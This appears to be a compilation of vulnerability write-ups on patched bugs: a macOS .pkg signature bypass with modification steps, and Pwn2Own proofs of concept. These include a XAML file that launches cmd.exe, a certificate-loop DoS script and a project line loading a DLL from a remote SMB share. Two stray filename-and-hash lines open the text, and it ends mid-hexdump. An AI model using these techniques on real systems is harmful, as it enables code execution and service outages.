Qruhaepdediwhf.dll e87a4c23eac88803f27565c2a035222473167a14
v3.bs64 36af8aac85d4770146d7b6c6cbb0dc7691c6263a

Bad things come in large packages: .pkg signature verification bypass on macOS

13 January 2023 at 00:00

Code signing of applications is an essential element of macOS security. Besides signing applications, it is also possible to sign installer packages (.pkg files). During a short review of the xar source code, we found a vulnerability (CVE-2022-42841) that could be used to modify a signed installer package without invalidating its signature. This vulnerability could be abused to bypass Gatekeeper, SIP and under certain conditions elevate privileges to root.


Installer packages are based on xar files with a number of predefined file names. The method for signing installer packages is the same as generating signed xar files, so to start we’ll explain how that file format works.

A xar file consists of 3 parts: a fixed length header, a table of contents (TOC) and what is called the “heap”.

The header contains a number of fields, including the hashing algorithm that is used throughout the file (typically still SHA1) and the size of the TOC.

The TOC is a zlib-compressed XML document. This document lists for each file included in the archive the start address and length where the contents can be found on the heap, starting with 0 for the first byte directly after the TOC. Each file in the archive can be compressed independently by specifying an encoding, so when creating an archive file it is possible to choose the optimal way of storing each file.

For all files, a hash is included in the TOC of both the uncompressed and compressed data, using the hashing algorithm specified in the header.

For example:

<file id="4">
    <encoding style="application/x-bzip2"/>
    <extracted-checksum style="sha1">c5c07ac6917dbbbacf1044700559dfff3c96ac26</extracted-checksum>
    <archived-checksum style="sha1">bda75d4a4f97c71985cdb5d3350fea8a62bbad0e</archived-checksum>

Even xar files that are not signed have these hashes and so the integrity can be verified when extracting a file.

To verify the integrity of the entire archive, the TOC also lists the location on the heap where a value known as the “TOC hash” is stored. In practice this is usually at offset 0:

<checksum style="sha1">

The value stored here must be equal to the hash of the compressed TOC data and this is verified when the archive is opened. The reason this is included on the heap and not in the TOC itself is that this would create a cyclic dependency: adding this value into the TOC would change the TOC and the TOC hash again.

This hash indirectly guarantees the integrity of all files in the archive: for each file, the extracted-checksum in the TOC ensures the integrity of that file. The integrity of the TOC is covered by the TOC hash. This construction has the nice benefit that a single file can be extracted and validated without having to validate the entire archive. This means it is possible to extract files from xar archives without completely reading the archive, or possibly even without completely downloading it.

Signed xar files additionally contain a signature element with a certificate chain in the TOC:

<signature style="RSA">
  <KeyInfo xmlns="">

The signature itself is also stored on the heap (for the same cyclic dependency reason). The data used for generating the signature is the TOC hash. This signature therefore ensures the authenticity of all files in the archive.

Interestingly, this design does mean that data on the heap that is not included in any of the ranges can be modified without invalidating the signature. For example, appending more data to a xar file will always keep the TOC hash and signature valid.

The vulnerability

For signed packages, the TOC hash needs to be used for two different checks:

  • The computed TOC hash needs to be equal to the TOC hash stored on the heap.
  • The signature and the certificates need to correspond to the TOC hash.

This is implemented in the following locations in the xar source code.

Here, the computed TOC is compared to the value stored on the heap.

/* if TOC specifies a location for the checksum, make sure that
 * we read the checksum from there: this is required for an archive
 * with a signature, because the signature will be checked against
 * the checksum at the specified location <rdar://problem/7041949>
const char *value;
uint64_t offset = 0;
uint64_t length = 0;
if( xar_prop_get( XAR_FILE(ret) , "checksum/offset", &value) == 0 ) {
    if (value) {
        errno = 0;
        offset = strtoull( value, (char **)NULL, 10);
        if( errno != 0 ) {
            fprintf(stderr, "checksum/offset missing or invalid!\n");
            return NULL;
    } else {
        fprintf(stderr, "checksum/offset missing or invalid!\n");
        return NULL;


XAR(ret)->heap_offset = xar_get_heap_offset(ret) + offset;
if( lseek(XAR(ret)->fd, XAR(ret)->heap_offset, SEEK_SET) == -1 ) {
    return NULL;

size_t tlen = 0;
void *toccksum = xar_hash_finish(XAR(ret)->toc_hash_ctx, &tlen);
XAR(ret)->toc_hash_ctx = NULL;

if( length != tlen ) {
    return NULL;

// Store our toc hash upon archive open, so callers can determine if it
// has changed or been tampered with after archive open
XAR(ret)->toc_hash = malloc(tlen);
memcpy(XAR(ret)->toc_hash, toccksum, tlen);
XAR(ret)->toc_hash_size = tlen;

void *cval = calloc(1, tlen);
if( ! cval ) {
    return NULL;

ssize_t r = xar_read_fd(XAR(ret)->fd, cval, tlen);


if( memcmp(cval, toccksum, tlen) != 0 ) {
    fprintf(stderr, "Checksums do not match!\n");
    return NULL;

This first retrieves the attribute checksum attribute from the XML document as a const char *value. Then, strtoull converts it to an unsigned 64-bit integer and it gets stored in the offset variable.

For obtaining the TOC hash for validating the signature, a similar bit of code is used:

uint32_t offset = 0;
xar_t x = NULL;
const char  *value;

// xar 1.6 fails this method if any of data, length, signed_data, signed_length are NULL
// within OS X we use this method to get combinations of signature, signed data, or signed_offset,
// so this method checks and sets these out values independently

if( !sig )
  return -1;

x = XAR_SIGNATURE(sig)->x;

/* Get the checksum, to be used for signing.  If we support multiple checksums
  in the future, all checksums should be retrieved            */
if(length) {
  if(0 == xar_prop_get_expect_notnull( XAR_FILE(x) , "checksum/size", &value)){
    *length  = strtoull( value, (char **)NULL, 10);

  if(0 == xar_prop_get_expect_notnull( XAR_FILE(x) , "checksum/offset", &value)){
    offset  = strtoull( value, (char **)NULL, 10);

  if(data) {
    *data = malloc(sizeof(char)*(*length));

    // This function will either read all of length or return -1. Check and bubble up.
    if (_xar_signature_read_from_heap(x, offset, *length, *data) != 0)
      return -1;

Note here the tiny but very important difference: while the first comparison was storing the offset in uint64_t offset (a 64-bit unsigned integer), here it uses an uint32_t offset (a 32-bit unsigned integer). This difference means that if the offset is outside of the range that can be stored in a 32-bit value, the two checks can use a different heap offset. For example, if the offset is equal to 0x1 0000 0000, then the integrity hash will be read from 0x1 0000 0000, while the signature hash will be read from offset 0x0 on the heap.

Thus, it was possible to modify a xar file without invalidating its signature as follows:

  1. Take a correctly signed xar file and parse the TOC.
  2. Change the checksum offset value to 4294967296 (and make any other changes you want to the included files, like adding a malicious preinstall script or replacing the installation check script).
  3. Write the modified TOC back to the file and compute the new TOC hash.
  4. Add padding until the heap is exactly 4294967296 bytes (4 GiB) in size.1
  5. Place the new TOC hash at heap offset 4294967296, leaving the original TOC hash at heap offset 0.

When this package is verified, the integrity check will use the hash at offset 4294967296, while the signature verification will read it from offset 0. The integrity check will pass, because the new TOC hash is placed there, while the signature will also pass, because the signatures still correspond to the old TOC hash.


This was quite an interesting bug that could be applied in a number of different ways, with different requirements and impact.

Bypassing SIP’s filesystem restrictions

When a package is installed that is signed by Apple, installation works a little differently compared to an installation of a package by signed by anyone else. These installations are performed by system_installd, instead of installd, which has an entitlement granting it access to all files normally protected by SIP:

  [Bool] true

This makes sense, as updates from Apple often need to write to protected locations, like replacing components of the OS.

Abusing this vulnerability to modify a package signed by Apple would make it possible to read and write to all those SIP protected files. This could be used to, for example:

  • Grant an application TCC permissions, like access to the webcam, microphone, etc.
  • Read data from a data vault, such as the user’s Mail and Safari data.
  • Load a kernel extension without user approval on Intel macs (although the kernel extension would need to be properly signed).

This could be used to modify a package that a user installs manually, although that requires convincing the user. Another option would be a process that has already obtained root privileges using this to gain access to SIP protected locations, as the root user is allowed to use the install command to perform the installation of new packages.

Note that any files on the Signed System Volume (SSV) could not be modified this way, as that disk is mounted read-only.

Bypassing Gatekeeper

After downloading a .pkg file, Gatekeeper will perform a notarization check, similar to that for applications. It takes the hash of the package and submits it to Apple to check that it has been scanned for malware. When a user opens a package that was not notarized, they receive a scary warning, making it quite difficult to trick a user into installing a package containing malware.

The method for querying Apple’s server for the notarization status of a package uses the same function to obtain the TOC hash as was used for the signature verification. Therefore, a modified package will still be considered notarized if the original was. This means that if a user downloads such a modified package file, they will not be warned in any way.

Asking users to download a 4 GiB .pkg sounds like a challenge. Even if users don’t notice the unusual size, the fact that they need to wait a few minutes for the download to finish could allow them to spot that something is off about the webpage offering the download. Luckily, the padding in the package can be anything, so when using the same byte for all the padding, the resulting file compresses very well. By placing the package on a compressed disk image, the resulting .dmg file can be only a few hundred kilobytes. Distributing an application in this way is also not unusual for macOS. The increase in size also does not increase the time required for verify the package, as mentioned only the integrity of data on the heap that is actually in use is checked.

Combining this with the previous vulnerability would allow for some very powerful malware: it would be possible to create a manipulated installer package that appears completely legitimate and triggers no warnings when installed. After the user installs it, the malware immediately gains complete access to all SIP-protected data on the system.

Elevating privileges

We did not find a way to abuse this vulnerability for privilege escalation on an out-of-the-box installation of macOS. However, when combined with certain third-party software, we did find a method.

Some applications try to make sure that their application can update itself automatically, even if the current user is not an admin user. Normally, non-admin users are not allowed to make changes in /Applications, so they can not update any existing applications. If the admin never logs in, this could mean that users run known vulnerable software indefinitely.

To solve that, some applications include a privileged helper tool to perform the upgrade. This is a tool that runs as root and has the single purpose of installing updates for the existing application. Often, the application itself handles the checking for updates and downloading a new update file, the tool only performs the actual installation.

To make this secure, there are two important checks:

  • A request to install an update must originate from the associated application.
  • The update file must be authentic (and not a downgrade).

The format of the update file varies between the applications that implement this, but using .pkg files is common. If this method is used, then it may be possible to swap out an update package with a modified version. For example, by using a race condition to change the package in between the download by the application and the actual installation by the privileged helper tool. This means that the package would be installed automatically, allowing privilege escalation to root.

In fact, this vulnerability was originally discovered when investigating the privileged helper tool used by Zoom. In the DEF CON 30 talk “You’re Muted Rooted” by Patrick Wardle he described a method for bypassing the signature verification performed by Zoom. This was addressed by switching to the libxar functions for verifying a package signature.


During our research to investigate the full impact of this vulnerability, we also attempted to modify macOS system updates. These also use .pkg files and verify the TOC hash, however, they compare it to the computed TOC hash. Therefore, replacing a system update with a malicious file is not possible.

This issue also does not affect iOS, as xar files are not used there anywhere as far as we could tell. While signed xar files have been used for Safari extensions in the past, they now use app extensions, so we could also not identify any impact there.


The following video demonstrates the use of this vulnerability to bypass Gatekeeper and SIP. As can be seen, it creates a new file in /private/var/db/SystemPolicyConfiguration/, a directory normally protected by SIP.

(Note that the installer states that the installation has failed, but the exploit already ran using a pre-install script. This is only the case for the demo and could be avoided for a real attack.)

The fix

This was fixed by Apple with a 2 character fix: changing uint32_t to uint64_t in macOS 13.1.

What is interesting about this vulnerability is that there was a similar issue in 2010: CVE-2010-0055. In that version, one of the checks assumed that the TOC hash offset was always 0 and the other used the value read from the TOC. Vulnerabilities that are variants of fixed issues and regressions that re-introduce a vulnerability are sadly common, but to see a vulnerability similar to a 12 year old vulnerability is still surprising. Especially considering that a small change to this library could prevent all similar vulnerabilities that lead to the same result.

A comment in the code snippet above notes the following:

Store our toc hash upon archive open, so callers can determine if it has changed or been tampered with after archive open

Using this stored value instead of reading it from the file again would have made this vulnerability, and any similar variants, impossible to exploit as the value would not be read from the heap twice.

  1. If the original package is already more than 4 GiB in size, then there are a number of options. For example, padding the file to 8, 12, 16, etc. GiB instead. Or it would be possible to move files on the heap around to make the offset 4294967296 available. ↩︎

Pwn2Own Miami 2022: ICONICS GENESIS64 Arbitrary Code Execution

17 October 2022 at 00:00

This write-up is part 5 of a series of write-ups about the 5 vulnerabilities we demonstrated last April at Pwn2Own Miami. This is the write-up for an Arbitrary Code Execution vulnerability in ICONICS GENESIS64 (CVE-2022-33315).

We successfully demonstrated this vulnerability during the competition, however it turned out that the vendor was already aware of this vulnerability. As this was also one of the most shallow bugs we used during the competition, this was something we already anticipated. The bug was originally reported by Zymo Security and disclosed as Luckily, this was the only bug collision we had during this competition.

A 3rd bug collision on Day 1. The team @sector7_nl successfully popped calc, but the bug they used had been disclosed earlier in the competition. They still win $5,000 and 5 Master of Pwn points. #Pwn2Own

— Zero Day Initiative (@thezdi) April 19, 2022

GENESIS64 was one of the two targets in the Control Server category. It is more of a software suite than a single application and can be used to design and visualize entire ICS environments. From dashboards and control screens to visualizing entire factory floors in 3D.

Save files

For this category it was acceptable to achieve code execution by opening a file within the target on the contest laptop. The files must be file types that are handled by default by the target application. So we opened up one of the applications that came with the GENESIS64 installer. We choose GraphWorX64 at random (it is normally used to design HMI/SCADA control screens), and saved an empty file. When looking at the empty project file, we can see it is stored as a WPF XAML file:

<?xml version="1.0" encoding="utf-8"?>
<Canvas Background="#FFFFFFFF" Width="3840" Height="2320" xmlns="" xmlns:x="" xmlns:iwm="clr-namespace:Ico.Windows.Media;assembly=IcoWPF" xmlns:gwx="clr-namespace:Ico.Gwx;assembly=GwxRuntimeCore">
        <BitmapImage x:Key="GwxThumbnailImageKey">
        <gwx:GwxDocument FileVersion="" ScanRate="500" />

Using XAML it is possible to directly instantiate objects of arbitrary types. This makes it unsuitable for loading untrusted input files. We quote a small piece of the relevant manual (System.Windows.Markup.XamlReader) from Microsoft regarding the loading of untrusted XAML files:

Code Access Security, Loose XAML, and XamlReader

XAML is a markup language that directly represents object instantiation and execution. Therefore, elements created in XAML have the same ability to interact with system resources (network access, file system IO, for example) as the equivalent generated code does.

The implications of these statements for XamlReader is that your application design must make trust decisions about the XAML you decide to load. If you are loading XAML that is not trusted, consider implementing your own sandboxing technique for how you load the resulting object graph.

Unfortunately GENESIS64 has no such sandboxing technique in place, so instantiating arbitrary objects is trivial. The actual decoding of this file seems to happen in Components/IcoWPF.dll, using a wrapper around XamlReader().

Our exploit

In the end we used the following XAML file for instantiating a Process object and providing it the necessary parameters for starting our beloved calculator. This calls the method Start using the parameters cmd.exe /c calc.exe:

<?xml version="1.0" encoding="utf-8"?>
    <ObjectDataProvider x:Key="Sector7" ObjectType="{x:Type Diag:Process}" MethodName="Start">
            <System:String>/c calc.exe</System:String>
        <gwx:GwxDocument FileVersion="" ScanRate="500" />

You can see the exploit in action in the screen recording below.


To fully mitigate this vulnerability, it would be advised to use a different file format. However, this would also mean that old project files would be unable to load. ICONICS settled for a blocklist approach, with the release of version 10.97.2. In that version, the XAML file is pre-parsed before being passed to XamlReader() and certain classes are excluded from deserialization.

We thank Zero Day Initiative for organizing this years edition of Pwn2Own Miami, we hope to return to a later edition!

You can find the other four write-ups here:

Pwn2Own Miami 2022: Unified Automation C++ Demo Server DoS

14 September 2022 at 00:00

This write-up is part 4 of a series of write-ups about the 5 vulnerabilities we demonstrated last April at Pwn2Own Miami. This is the write-up for a Denial-of-Service in the Unified Automation OPC UA C++ Demo Server (CVE-2022-37013).

Confirmed! The team from @sector7_nl leveraged an infinite loop condition to create a DoS against the Unified Automation C++ Demo Server. They earn $5,000 and 5 points towards Master of Pwn. #Pwn2Own #P2OMiami

— Zero Day Initiative (@thezdi) April 20, 2022

OPC UA is a communication protocol used in the ICS world. It is an open standard developed by the OPC Foundation. Because it is implemented by many vendors, it is often the preferred protocol for setting up communication between systems from different vendors in an ICS network.

At Pwn2Own Miami 2022, four OPC UA servers were in scope, with three different “payload” options:

  • Denial-of-Service. Availability is everything in an ICS network, so being able to crash an OPC UA server can have significant impact.
  • Remote code execution. Being able to take over the server.
  • Bypass Trusted Application Check. Setting up a trusted connection to a server without having a valid certificate.

If an client connects with the server it first needs to authenticate using a client certificate. We call this the trusted application check. The protocol also supports user authentication, using either username/password combination or certificates, but this is only after the client application itself has been authenticated. Although OPC UA uses the same X.509 certificates as TLS, the protocol itself is not based on TLS.

For the OPC UA server category we focused on bypassing the trusted application check, as this would gain us the most points. We did not look at remote code execution vulnerabilities. A trusted application means the application can authenticate with a valid certificate. This meant we only had to audit the certificate verification function, which is a very limited scope. We looked at all applications in scope, and in the end did find such a vulnerability in the OPC Foundation OPC UA .NET Standard (you can find the write-up for this vulnerability here).

In the Unified Automation C++ Demo Server we couldn’t find a way to bypass the check, however we did find a reliable Denial-of-Service while reviewing this. Since this Denial-of-Service is in the certificate verification function, it means we can trigger this vulnerability before authentication. In the ICS world where everything revolves around availability, having a vulnerability that allows the attacker to reliably disable a central component is less than ideal.

Certificate verification

Verifying the certificate for a client is handled by the function OpcUa_P_OpenSSL_PKI_ValidateCertificate() in uastack.dll. This function will call OpcUa_P_OpenSSL_CertificateStore_IsExplicitlyTrusted(), which will check if the certificate or any of its issuers are already explicitly trusted. It will do so by walking the certificate chain and checking each certificate if it is equal to a trusted certificate; meaning its SHA1 hash is equal to that of a file under the pki/trusted/certs folder on the server.

The source code for this function seems to be similar to some code from the OPC Foundation, which can be found on GitHub:

static OpcUa_StatusCode OpcUa_P_OpenSSL_CertificateStore_IsExplicitlyTrusted(
    OpcUa_P_OpenSSL_CertificateStore* a_pStore,
    X509_STORE_CTX* a_pX509Context,
    X509* a_pX509Certificate,
    OpcUa_Boolean* a_pExplicitlyTrusted)
    X509* x = a_pX509Certificate;
    X509* xtmp = OpcUa_Null;
    int iResult = 0;
    OpcUa_UInt32 jj = 0;
    OpcUa_ByteString tBuffer;
    OpcUa_Byte* pPosition = OpcUa_Null;
    OpcUa_P_OpenSSL_CertificateThumbprint tThumbprint;

OpcUa_InitializeStatus(OpcUa_Module_P_OpenSSL, "CertificateStore_IsExplicitlyTrusted");



    *a_pExplicitlyTrusted = OpcUa_False;

    /* follow the trust chain. */
    while (!*a_pExplicitlyTrusted)
        /* need to convert to DER encoded certificate. */
        int iLength = i2d_X509(x, NULL);

        if (iLength > tBuffer.Length)
            tBuffer.Length = iLength;
            tBuffer.Data = OpcUa_P_Memory_ReAlloc(tBuffer.Data, iLength);

        pPosition = tBuffer.Data;
        iResult = i2d_X509((X509*)x, &pPosition);

        if (iResult <= 0)

        /* compute the hash */
        SHA1(tBuffer.Data, iLength, tThumbprint.Data);

        /* check for thumbprint in explicit trust list. */
        for (jj = 0; jj < a_pStore->ExplicitTrustListCount; jj++)
            if (OpcUa_MemCmp(a_pStore->ExplicitTrustList[jj].Data, tThumbprint.Data, SHA_DIGEST_LENGTH) == 0)
                *a_pExplicitlyTrusted = OpcUa_True;

        if (*a_pExplicitlyTrusted)

        /* end of chain if self signed. */
        if (X509_STORE_CTX_get_check_issued(a_pX509Context)(a_pX509Context, x, x))

        /* look in the store for the issuer. */
        iResult = X509_STORE_CTX_get_get_issuer(a_pX509Context)(&xtmp, a_pX509Context, x);

        if (iResult == 0)

        /* oops - unexpected error */
        if (iResult < 0)

        /* goto next link in chain. */
        x = xtmp;





It will check if the SHA1 hash of the certificate is is the known trusted list. If not, it will continue the while loop, by checking if the issuer (obtained using X509_STORE_CTX_get_get_issuer()) is on the trusted list instead. This will continue until the entire chain has been checked.

However, what if there is a loop in the chain? In that case the while loop will turn into an infinite loop, as there is always some certificate to check. Since the entire network handling occurs in a single thread in the demo application, this will effectively make the server unresponsive for all clients. Creating a nice and effective Denial-of-Service. A loop of length one is a self-signed certificate, which is checked for (the call to X509_STORE_CTX_get_check_issued()), but it is in fact also possible to construct a loop of certificates which is longer.

Our exploit

Our exploit is simple. First we generate two certificates A and B. Since for signing the certificate you only need the private key, we can sign certificate A with the key of B, and B with the key of A. This will create a certificate chain where both certificate have each other as issuer; and thus creating a loop.

def make_cert(name, issuer, public_key, private_key, identifier, issuer_identifier):
	one_day = datetime.timedelta(1, 0, 0)

	builder = x509.CertificateBuilder()

	builder = builder.subject_name(x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, name)]))

	builder = builder.issuer_name(x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, issuer)]))

	builder = builder.not_valid_before( - (one_day * 7))
	builder = builder.not_valid_after( + (one_day * 90))
	builder = builder.serial_number(x509.random_serial_number())
	builder = builder.public_key(public_key)
	builder = builder.add_extension(x509.SubjectKeyIdentifier(identifier), critical=False)
	builder = builder.add_extension(x509.AuthorityKeyIdentifier(key_identifier=issuer_identifier, authority_cert_issuer=None, authority_cert_serial_number=None), critical=False)
	builder = builder.add_extension(x509.BasicConstraints(ca=True, path_length=None), critical=False)

	# No idea if all of these are needed, but data_encipherment is required.
	builder = builder.add_extension(x509.KeyUsage(digital_signature=True, content_commitment=True, key_encipherment=True, data_encipherment=True,
		key_agreement=True, key_cert_sign=True, crl_sign=True, encipher_only=False, decipher_only=False), critical=False)

	# The certificate is actually self-signed, but this doesn't matter because the signature is not checked.
	certificate = builder.sign(private_key=private_key, algorithm=hashes.SHA256(), backend=backend)

	return certificate

private_keyA = rsa.generate_private_key(public_exponent=65537, key_size=3072, backend=backend)
public_keyA = private_keyA.public_key()

private_keyB = rsa.generate_private_key(public_exponent=65537, key_size=3072, backend=backend)
public_keyB = private_keyB.public_key()

certA = make_cert("A", "B", public_keyA, private_keyB, b"1", b"2")
certB = make_cert("B", "A", public_keyB, private_keyA, b"2", b"1")

By trying to authenticate at the server using this certificate and including the other as an additional certificate, we can see that eventually we reach a timeout and the server will spin at 100% CPU usage.

You can see the exploit in action in the screen recording below.


OPC UA is often a central component between the IT and OT network of an organisation. Being able to reliably shut it down pre-authentication is a powerful primitive to have. This vulnerability shows yet again that validating certificates is an error prone operation, that should be handled with care.

This issue was fixed in version v1.7.7-549 and was given the CVE number CVE-2022-29862. Unified-Automation now uses the certificate stack that was constructed by OpenSSL for validation.

We thank Zero Day Initiative for organizing this years edition of Pwn2Own Miami, we hope to return to a later edition!

You can find the other four write-ups here:

Pwn2Own Miami 2022: AVEVA Edge Arbitrary Code Execution

8 September 2022 at 00:00

This write-up is part 3 of a series of write-ups about the 5 vulnerabilities we demonstrated last April at Pwn2Own Miami. This is the write-up for an Arbitrary Code Execution vulnerability in AVEVA Edge (CVE-2022-28688).

Confirmed! @daankeuper & @xnyhps from @sector7_nl used an uncontrolled search path vuln to get RCE in AVEVA Edge. They win $20,000 and 20 Master of Pwn points. #Pwn2Own #P2O

— Zero Day Initiative (@thezdi) April 19, 2022

AVEVA Edge can be used to design Human Machine Interfaces (HMI). It allows for the designing of GUI applications, which can be programmed using a scripting language. The screenshot below shows one of the demo projects that come with the installer:


For this category it was acceptable to achieve code execution by opening a project file within the target on the contest laptop. So we tried various things to get code execution from opening a malicious project file. The application has quite some functionalities that might be useful for achieving our goal. Users can add custom controls to a project, it has a powerful scripting language and it will connect to OPC UA servers upon starting, for example. However, most attack surface will require the user to first make one or more clicks within the application; which was not allowed for the competition.

Communication drivers

AVEVA Edge also allows users to add communication drivers to a project. For example is has drivers to allow communication with a Siemens S7 PLC over a serial interface. Drivers in this case are just DLL files that are loaded into the project.

Communication drivers

Drivers are loaded whenever the user loads a project file in AVEVA Edge, which would mean that vulnerabilities here would be triggered without further user interaction.

AVEVA Edge projects consists of multiple files and directories, but the main project file that is also associated with the application is a INI-formatted file using the .app extension. The relevant section for communication drivers can be seen below:

Task0=Driver ABCIP

When looking at the loading process with Procmon we see that drivers are loaded from C:\Program Files (x86)\AVEVA\AVEVA Edge 2020\Drv\:

Lets see what happens if we change the INI file to:

Task0=Driver ..\Computest

Loading the new project shows us:

Interesting :)…

For those interested, the actual loading of the file happens in Bin/Studio.dll at address 0x100c16f1.


From here exploitation is easy, we create a malicious DLL file:

// dllmain.cpp
#include "pch.h"

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
    CreateProcessA(NULL, (LPSTR)"calc.exe", NULL, NULL, TRUE, 0, NULL, NULL, si, pi);

    return TRUE;

And let it load from an open SMB share:

Task0=Driver \\<IP>\shared\Sector7

You can see the exploit in action in the screen recording below.


Interestingly enough all binaries, including the drivers, that come with AVEVA Edge are digitally signed. However, it appears that signatures are not checked when loading libraries.

Customers who use AVEVA Edge should update to version 2020 R2 SP1 and apply HF 2020.2.00.40, which should mitigate this issue.

We thank Zero Day Initiative for organizing this years edition of Pwn2Own Miami, we hope to return to a later edition!

You can find the other four write-ups here:

Process injection: breaking all macOS security layers with a single vulnerability

12 August 2022 at 00:00

If you have created a new macOS app with Xcode 13.2, you may noticed this new method in the template:

- (BOOL)applicationSupportsSecureRestorableState:(NSApplication *)app {
	return YES;

This was added to the Xcode template to address a process injection vulnerability we reported!

In October 2021, Apple fixed CVE-2021-30873. This was a process injection vulnerability affecting (essentially) all macOS AppKit-based applications. We reported this vulnerability to Apple, along with methods to use this vulnerability to escape the sandbox, elevate privileges to root and bypass the filesystem restrictions of SIP. In this post, we will first describe what process injection is, then the details of this vulnerability and finally how we abused it.

This research was also published at Black Hat USA 2022 and DEF CON 30.

Process injection

Process injection is the ability for one process to execute code in a different process. In Windows, one reason this is used is to evade detection by antivirus scanners, for example by a technique known as DLL hijacking. This allows malicious code to pretend to be part of a different executable. In macOS, this technique can have significantly more impact than that due to the difference in permissions two applications can have.

In the classic Unix security model, each process runs as a specific user. Each file has an owner, group and flags that determine which users are allowed to read, write or execute that file. Two processes running as the same user have the same permissions: it is assumed there is no security boundary between them. Users are security boundaries, processes are not. If two processes are running as the same user, then one process could attach to the other as a debugger, allowing it to read or write the memory and registers of that other process. The root user is an exception, as it has access to all files and processes. Thus, root can always access all data on the computer, whether on disk or in RAM.

This was, in essence, the same security model as macOS until the introduction of SIP, also known as “rootless”. This name doesn’t mean that there is no root user anymore, but it is now less powerful on its own. For example, certain files can no longer be read by the root user unless the process also has specific entitlements. Entitlements are metadata that is included when generating the code signature for an executable. Checking if a process has a certain entitlement is an essential part of many security measures in macOS. The Unix ownership rules are still present, this is an additional layer of permission checks on top of them. Certain sensitive files (e.g. the database) and features (e.g. the webcam) are no longer possible with only root privileges but require an additional entitlement. In other words, privilege escalation is not enough to fully compromise the sensitive data on a Mac.

For example, using the following command we can see the entitlements of

$ codesign -dvvv --entitlements - /System/Applications/

In the output, we see the following entitlement:

		[Bool] true

This is what grants the permission to read the SIP protected mail database, while other malware will not be able to read it.

Aside from entitlements, there are also the permissions handled by Transparency, Consent and Control (TCC). This is the mechanism by which applications can request access to, for example, the webcam, microphone and (in recent macOS versions) also files such as those in the Documents and Download folders. This means that even applications that do not use the Mac Application sandbox might not have access to certain features or files.

Of course entitlements and TCC permissions would be useless if any process can just attach as a debugger to another process of the same user. If one application has access to the webcam, but the other doesn’t, then one process could attach as a debugger to the other process and inject some code to steal the webcam video. To fix this, the ability to debug other applications has been heavily restricted.

Changing a security model that has been used for decades to a more restrictive model is difficult, especially in something as complicated as macOS. Attaching debuggers is just one example, there are many similar techniques that could be used to inject code into a different process. Apple has squashed many of these techniques, but many other ones are likely still undiscovered.

Aside from Apple’s own code, these vulnerabilities could also occur in third-party software. It’s quite common to find a process injection vulnerability in a specific application, which means that the permissions (TCC permissions and entitlements) of that application are up for grabs for all other processes. Getting those fixed is a difficult process, because many third-party developers are not familiar with this new security model. Reporting these vulnerabilities often requires fully explaining this new model! Especially Electron applications are infamous for being easy to inject into, as it is possible to replace their JavaScript files without invalidating the code signature.

More dangerous than a process injection vulnerability in one application is a process injection technique that affects multiple, or even all, applications. This would give access to a large number of different entitlements and TCC permissions. A generic process injection vulnerability affecting all applications is a very powerful tool, as we’ll demonstrate in this post.

The saved state vulnerability

When shutting down a Mac, it will prompt you to ask if the currently open windows should be reopened the next time you log in. This is a part of functionally called “saved state” or “persistent UI”.

When reopening the windows, it can even restore new documents that were not yet saved in some applications.

It is used in more places than just at shutdown. For example, it is also used for a feature called App Nap. When application has been inactive for a while (has not been the focused application, not playing audio, etc.), then the system can tell it to save its state and terminates the process. macOS keeps showing a static image of the application’s windows and in the Dock it still appears to be running, while it is not. When the user switches back to the application, it is quickly launched and resumes its state. Internally, this also uses the same saved state functionality.

When building an application using AppKit, support for saving the state is for a large part automatic. In some cases the application needs to include its own objects in the saved state to ensure the full state can be recovered, for example in a document-based application.

Each time an application loses focus, it writes to the files:

~/Library/Saved Application State/<Bundle ID>.savedState/windows.plist
~/Library/Saved Application State/<Bundle ID>.savedState/

The windows.plist file contains a list of all of the application’s open windows. (And some other things that don’t look like windows, such as the menu bar and the Dock menu.)

For example, a windows.plist for could look like this:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "">
<plist version="1.0">
		<key>MenuBar AvailableSpace</key>
		<string>{{7, 454}, {14, 16}}</string>
		<string>177 501 586 476 0 0 1680 1025 </string>
		<string>{{27, 454}, {14, 16}}</string>
		<string>{{47, 454}, {14, 16}}</string>
				<string>New Document</string>

The file contains a custom binary format. It consists of a list of records, each record contains an AES-CBC encrypted serialized object. The windows.plist file contains the key (NSDataKey) and a ID (NSWindowID) for the record from it corresponds to.1

For example:

00000000  4e 53 43 52 31 30 30 30  00 00 00 01 00 00 01 b0  |NSCR1000........|
00000010  ec f2 26 b9 8b 06 c8 d0  41 5d 73 7a 0e cc 59 74  |..&.....A]sz..Yt|
00000020  89 ac 3d b3 b6 7a ab 1b  bb f7 84 0c 05 57 4d 70  |..=..z.......WMp|
00000030  cb 55 7f ee 71 f8 8b bb  d4 fd b0 c6 28 14 78 23  |.U..q.......(.x#|
00000040  ed 89 30 29 92 8c 80 bf  47 75 28 50 d7 1c 9a 8a  |..0)....Gu(P....|
00000050  94 b4 d1 c1 5d 9e 1a e0  46 62 f5 16 76 f5 6f df  |....]...Fb..v.o.|
00000060  43 a5 fa 7a dd d3 2f 25  43 04 ba e2 7c 59 f9 e8  |C..z../%C...|Y..|
00000070  a4 0e 11 5d 8e 86 16 f0  c5 1d ac fb 5c 71 fd 9d  |...]........\q..|
00000080  81 90 c8 e7 2d 53 75 43  6d eb b6 aa c7 15 8b 1a  |....-SuCm.......|
00000090  9c 58 8f 19 02 1a 73 99  ed 66 d1 91 8a 84 32 7f  |.X....s..f....2.|
000000a0  1f 5a 1e e8 ae b3 39 a8  cf 6b 96 ef d8 7b d1 46  |.Z....9..k...{.F|
000000b0  0c e2 97 d5 db d4 9d eb  d6 13 05 7d e0 4a 89 a4  |...........}.J..|
000000c0  d0 aa 40 16 81 fc b9 a5  f5 88 2b 70 cd 1a 48 94  |..@.......+p..H.|
000000d0  47 3d 4f 92 76 3a ee 34  79 05 3f 5d 68 57 7d b0  |G=O.v:.4y.?]hW}.|
000000e0  54 6f 80 4e 5b 3d 53 2a  6d 35 a3 c9 6c 96 5f a5  |To.N[=S*m5..l._.|
000000f0  06 ec 4c d3 51 b9 15 b8  29 f0 25 48 2b 6a 74 9f  |..L.Q...).%H+jt.|
00000100  1a 5b 5e f1 14 db aa 8d  13 9c ef d6 f5 53 f1 49  |.[^..........S.I|
00000110  4d 78 5a 89 79 f8 bd 68  3f 51 a2 a4 04 ee d1 45  |MxZ.y..h?Q.....E|
